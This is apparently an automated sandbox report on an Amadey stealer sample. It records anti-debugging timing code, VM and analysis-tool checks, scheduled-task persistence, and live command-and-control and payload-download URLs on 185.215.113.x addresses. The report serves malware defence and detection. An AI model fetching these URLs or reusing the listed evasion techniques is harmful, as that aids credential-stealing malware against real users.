Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54409A2 second address: 54409FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a pushad 0x0000000b mov esi, edi 0x0000000d jmp 00007FA934C8B339h 0x00000012 popad 0x00000013 je 00007FA9A6770D00h 0x00000019 jmp 00007FA934C8B32Eh 0x0000001e test byte ptr [76FB6968h], 00000002h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FA934C8B337h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54409FD second address: 5440A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA9347D66BFh 0x00000009 add eax, 78CC617Eh 0x0000000f jmp 00007FA9347D66C9h 0x00000014 popfd 0x00000015 push eax 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jne 00007FA9A62BC037h 0x00000020 pushad 0x00000021 push esi 0x00000022 pushad 0x00000023 popad 0x00000024 pop ebx 0x00000025 pushfd 0x00000026 jmp 00007FA9347D66C2h 0x0000002b jmp 00007FA9347D66C5h 0x00000030 popfd 0x00000031 popad 0x00000032 mov edx, dword ptr [ebp+0Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov di, B0EEh 0x0000003c pushfd 0x0000003d jmp 00007FA9347D66BFh 0x00000042 jmp 00007FA9347D66C3h 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440A99 second address: 5440A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440A9F second address: 5440AC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA9347D66C5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440AC8 second address: 5440B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA934C8B331h 0x0000000f xchg eax, ebx 0x00000010 jmp 00007FA934C8B32Eh 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 mov cl, BBh 0x00000019 pushfd 0x0000001a jmp 00007FA934C8B333h 0x0000001f add ah, 0000001Eh 0x00000022 jmp 00007FA934C8B339h 0x00000027 popfd 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FA934C8B32Ah 0x00000033 or ah, 00000018h 0x00000036 jmp 00007FA934C8B32Bh 0x0000003b popfd 0x0000003c push ecx 0x0000003d pop edi 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440B55 second address: 5440B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440B5B second address: 5440BBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B337h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FA934C8B336h 0x00000011 push dword ptr [ebp+14h] 0x00000014 jmp 00007FA934C8B330h 0x00000019 push dword ptr [ebp+10h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FA934C8B337h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440BBE second address: 5440BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440C18 second address: 5440C42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007FA934C8B32Eh 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov al, D7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440C42 second address: 5440C7B instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FA9347D66C2h 0x0000000d jmp 00007FA9347D66C5h 0x00000012 popfd 0x00000013 popad 0x00000014 mov esp, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440C7B second address: 5440C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440C7F second address: 5440C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440C83 second address: 5440C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440C89 second address: 5440C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66C1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450A9D second address: 5450AFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA934C8B331h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FA934C8B32Eh 0x00000015 mov ebp, esp 0x00000017 jmp 00007FA934C8B330h 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov edi, 5C441BE0h 0x00000025 movsx edi, si 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0652 second address: 54D0658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0658 second address: 54D065C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A734EA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 8BEA7F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AEE4EE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: C234EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: A6EA7F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: C9E4EE instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_054C0E69 rdtsc

0_2_054C0E69

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7784	Thread sleep time: -50025s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7808	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7808	Thread sleep time: -70035s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7780	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7792	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7792	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760	Thread sleep count: 249 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760	Thread sleep time: -7470000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7796	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7796	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7788	Thread sleep time: -38019s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: explorti.exe, explorti.exe, 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2896830843.0000000001609000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1702384952.0000000000A44000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1743583589.0000000000BF4000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1743939318.0000000000BF4000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_054C0A4A Start: 054C0A19 End: 054C0A1F

0_2_054C0A4A

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_054C0E69 rdtsc

0_2_054C0E69

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A3645B mov eax, dword ptr fs:[00000030h]		7_2_00A3645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A3A1C2 mov eax, dword ptr fs:[00000030h]		7_2_00A3A1C2

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

Jump to behavior

Source: explorti.exe, explorti.exe, 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_00A1D312 cpuid

7_2_00A1D312

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_00A1CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

7_2_00A1CB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 1.2.explorti.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.explorti.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.explorti.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1702163974.0000000000851000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1743759400.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1702733907.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1661714987.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1743489529.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1701960720.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2334522484.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	241 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	241 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	224 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	58%	ReversingLabs	Win32.Packed.Themida
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	55%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://185.215.113.16/	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exeWindows	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php	100%	Avira URL Cloud	malware
http://185.215.113.19/Vi9leo/index.phpQ	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exeta	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exe6522427f	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php6	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php	24%	Virustotal		Browse
http://185.215.113.16/steam/random.exeD	100%	Avira URL Cloud	phishing
http://185.215.113.16/ws	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exe	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exe00	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php6	18%	Virustotal		Browse
http://185.215.113.16/ata	100%	Avira URL Cloud	phishing
http://185.215.113.16/ws	18%	Virustotal		Browse
http://185.215.113.16/steam/random.exem32	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exe	24%	Virustotal		Browse
http://185.215.113.16/steam/random.exe5	100%	Avira URL Cloud	phishing
http://185.215.113.16/steam/random.exe6522427f	19%	Virustotal		Browse
http://185.215.113.16/	20%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpQ	3%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.php	true	24%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/	explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpQ	explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exeWindows	explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exeta	explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exe6522427f	explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php6	explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exeD	explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/ws	explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exe	explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	false	24%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exe00	explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/ata	explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exem32	explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exe5	explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.19	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502480
Start date and time:	2024-09-01 20:07:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/5@0/2
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target explorti.exe, PID 4856 because there are no executed function
Execution Graph export aborted for target explorti.exe, PID 4940 because there are no executed function
Execution Graph export aborted for target file.exe, PID 7108 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
14:09:03	API Interceptor	779x Sleep call for process: explorti.exe modified
19:07:56	Task Scheduler	Run new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.19	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
185.215.113.16	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16/well/random.exe
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/steam/random.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/well/random.exe
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16/well/random.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/well/random.exe
